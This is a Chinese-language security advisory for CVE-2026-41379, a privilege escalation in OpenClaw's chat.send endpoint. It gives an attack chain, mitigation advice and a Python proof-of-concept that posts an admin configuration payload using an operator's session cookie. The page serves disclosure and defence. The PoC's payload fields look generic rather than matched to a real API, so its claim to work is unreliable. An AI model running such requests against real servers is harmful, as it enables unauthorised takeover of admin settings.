CVE-2026-41379 CVSS 7.1 高危

CVE-2026-41379 OpenClaw权限提升漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41379

漏洞类型

权限提升

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.28之前的版本中存在严重的权限提升漏洞。该漏洞允许拥有写入权限的经过身份验证的操作员，利用chat.send端点访问管理员级别的Talk Voice配置持久化。攻击者可以绕过权限检查，修改本应仅限于管理员的敏感语音配置设置，从而破坏系统完整性并提升权限。

技术细节

该漏洞的核心在于OpenClaw应用程序中存在不安全的访问控制缺陷。在2026.3.28之前的版本中，`chat.send`端点未严格区分“操作员写入”权限与“管理员配置”权限的边界。系统后端在处理通过该端点提交的请求时，未对请求中包含的配置对象层级进行充分的权限校验。攻击者利用operator.write权限，可以构造特定的恶意数据包，将修改请求直接指向管理员专属的Talk Voice配置持久化接口。成功利用后，低权限用户能够篡改系统语音服务的关键参数，实现从操作员到管理员的非授权权限提升。

攻击链分析

STEP 1

1. 获取凭证

攻击者获取一个具有operator.write权限的OpenClaw低权限账户凭证。

STEP 2

2. 识别端点

攻击者分析应用程序接口，发现chat.send端点存在权限校验逻辑缺陷。

STEP 3

3. 构造恶意请求

攻击者利用脚本或工具构造包含管理员配置参数（Talk Voice Config）的恶意HTTP POST请求。

STEP 4

4. 发送攻击载荷

攻击者向chat.send端点发送该请求，利用operator.write权限触发配置修改逻辑。

STEP 5

5. 权限提升

服务器端未拦截请求，直接修改了管理员级别的语音配置，攻击者成功实现权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Exploit Title: OpenClaw Privilege Escalation via chat.send
# Date: 2026-04-28
# Exploit Author: Analyst
# Vendor Homepage: https://openclaw.example.com
# Version: < 2026.3.28

TARGET_URL = "http://target-openclaw-server/api/chat.send"
SESSION_COOKIE = "operator_session_cookie_with_write_privs"

# The payload attempts to inject admin-level configuration modifications
# into the chat.send endpoint.
payload = {
    "recipient": "admin",
    "message": "Hello",
    "malicious_config": {
        "talk_voice": {
            "persistence": {
                "admin_access": True,
                "sensitivity_level": "bypass"
            }
        }
    }
}

headers = {
    "Content-Type": "application/json",
    "Cookie": f"sessionid={SESSION_COOKIE}"
}

try:
    response = requests.post(TARGET_URL, data=json.dumps(payload), headers=headers)
    if response.status_code == 200:
        print("[+] Exploit successful! Admin voice configuration potentially modified.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        print(f"[-] Response: {response.text}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

OpenClaw < 2026.3.28

防御指南

临时缓解措施

在未升级版本前，建议管理员暂时禁用非必要用户的operator.write权限，或通过访问控制列表（ACL）限制对chat.send端点的网络访问，直至完成补丁更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表